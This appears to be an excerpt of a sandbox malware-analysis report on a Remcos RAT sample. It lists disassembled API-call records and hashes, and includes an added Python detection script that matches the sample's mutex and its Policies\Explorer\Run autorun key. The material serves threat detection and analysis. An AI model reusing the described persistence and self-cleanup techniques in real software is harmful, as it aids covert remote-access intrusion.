                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: TUF
                                        • API String ID: 1818849710-3431404234
                                        • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                        • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                        • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                        • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                        APIs
                                        • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                        • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TerminateThread$HookUnhookWindows
                                        • String ID: pth_unenc
                                        • API String ID: 3123878439-4028850238
                                        • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                        • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                        • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                        • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3360349984-0
                                        • Opcode ID: 72b013782cf94b1f3d34b8331976b904c6ebf93714f67b57431e08570f282644
                                        • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                        • Opcode Fuzzy Hash: 72b013782cf94b1f3d34b8331976b904c6ebf93714f67b57431e08570f282644
                                        • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5FB
                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B60F
                                        • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B61C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                        • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                        • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountEventTick
                                        • String ID: >G
                                        • API String ID: 180926312-1296849874
                                        • Opcode ID: 4dea9cf180482d33175dd0781c2a7a7f11c81ec4a99f4dcef033a069f5296280
                                        • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                        • Opcode Fuzzy Hash: 4dea9cf180482d33175dd0781c2a7a7f11c81ec4a99f4dcef033a069f5296280
                                        • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                        • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00412998
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteDirectoryFileRemove
                                        • String ID: pth_unenc
                                        • API String ID: 3325800564-4028850238
                                        • Opcode ID: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                        • Opcode Fuzzy Hash: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                        • GetLastError.KERNEL32 ref: 0040BEF1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateErrorLastMutex
                                        • String ID: Rmc-IUHLZ9
                                        • API String ID: 1925916568-3818685771
                                        • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                        • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
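Two of the routines listed above hand a detection engineer concrete host artifacts: the CreateMutexA/GetLastError pair at 0040BEE6 whose only string is Rmc-IUHLZ9 (calling GetLastError straight after CreateMutex is the standard single-instance guard, checking for ERROR_ALREADY_EXISTS), and the RegOpenKeyExW/RegDeleteValueW pair at 00412988 that removes a value under Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, an autorun location that is watched far less than the ordinary Run keys, followed by the DeleteFileW/RemoveDirectoryW cleanup at 0040AF84. The Python below is an added example written for this page, not code from the Joe Sandbox report or from Remcos: it matches those indicators against a constructed handle listing and constructed Sysmon-shaped registry events (Event ID 13 value set, Event ID 12 DeleteValue). The Rmc- prefix pattern for other builds, the value name Updater and the file paths are assumptions, marked as such in the code.

```python
import re
from typing import Dict, Iterable, List

# Indicators lifted from this report's function listings.
REMCOS_MUTEX = "Rmc-IUHLZ9"   # string referenced by the CreateMutexA/GetLastError routine at 0040BEE6
POLICY_RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"  # RegOpenKeyExW at 00412988

# Assumption (not in the report): other builds keep the "Rmc-" prefix with a different six-character suffix.
REMCOS_MUTEX_RE = re.compile(r"^Rmc-[A-Za-z0-9]{6}$")

# Matches the policy Run key under any hive spelling (HKLM\SOFTWARE\..., HKEY_LOCAL_MACHINE\Software\..., HKCU\...).
POLICY_RUN_RE = re.compile(r"\\Policies\\Explorer\\Run\\(?P<value>[^\\]+)$", re.IGNORECASE)


def check_mutexes(names: Iterable[str]) -> List[Dict[str, str]]:
    """Flag the exact mutex from this sample and, as a weaker signal, anything shaped like it."""
    alerts = []
    for name in names:
        if name == REMCOS_MUTEX:
            alerts.append({"rule": "remcos_mutex_exact", "mutex": name})
        elif REMCOS_MUTEX_RE.match(name):
            alerts.append({"rule": "remcos_mutex_pattern", "mutex": name})
    return alerts


def check_registry_events(events: Iterable[Dict]) -> List[Dict[str, str]]:
    """Sysmon-style registry events: ID 13 = value set, ID 12 with EventType DeleteValue = value removed.

    The sample's uninstall path deletes its own Policies\\Explorer\\Run value, so the delete is as
    interesting as the set: it marks the RAT cleaning up after itself."""
    alerts = []
    for ev in events:
        m = POLICY_RUN_RE.search(ev.get("TargetObject", ""))
        if not m:
            continue
        if ev.get("EventID") == 13:
            alerts.append({"rule": "policy_run_value_set", "value": m.group("value"),
                           "image": ev.get("Image", ""), "details": ev.get("Details", "")})
        elif ev.get("EventID") == 12 and ev.get("EventType") == "DeleteValue":
            alerts.append({"rule": "policy_run_value_deleted", "value": m.group("value"),
                           "image": ev.get("Image", "")})
    return alerts


# Constructed sample input (not from the report): a mutex/handle listing and three Sysmon-shaped events.
SAMPLE_MUTEXES = ["Rmc-IUHLZ9", "SM0:1234:64:WilError_03", "Rmc-ABC123"]
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Local\Temp\decoded.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updater",
     "Details": r"C:\ProgramData\Updater\updater.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",   # benign: RunMRU, not Policies\Explorer\Run
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": "calc"},
    {"EventID": 12, "EventType": "DeleteValue", "Image": r"C:\ProgramData\Updater\updater.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updater"},
]


def triage(mutexes=SAMPLE_MUTEXES, events=SAMPLE_EVENTS) -> List[Dict[str, str]]:
    """Run both checks and return the combined alert list."""
    return check_mutexes(mutexes) + check_registry_events(events)


if __name__ == "__main__":
    for alert in triage():
        print(alert)
```

The exact mutex name is the high-confidence indicator; treat the prefix pattern as a hunting lead only, since the suffix is operator-chosen. Because the routine at 00412988 deletes the value, a host examined after the RAT's uninstall path has run will show only the Event ID 12 record, so the delete rule should page at the same severity as the set.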
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                        • RegCloseKey.KERNEL32(?), ref: 0041255F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                        • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                        • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                        • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                        • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                        • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: xAG
                                        • API String ID: 176396367-2759412365
                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                        • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                        • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                        APIs
                                        • _free.LIBCMT ref: 0044B9EF
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap$_free
                                        • String ID:
                                        • API String ID: 1482568997-0
                                        • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                        • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                        • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                        • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
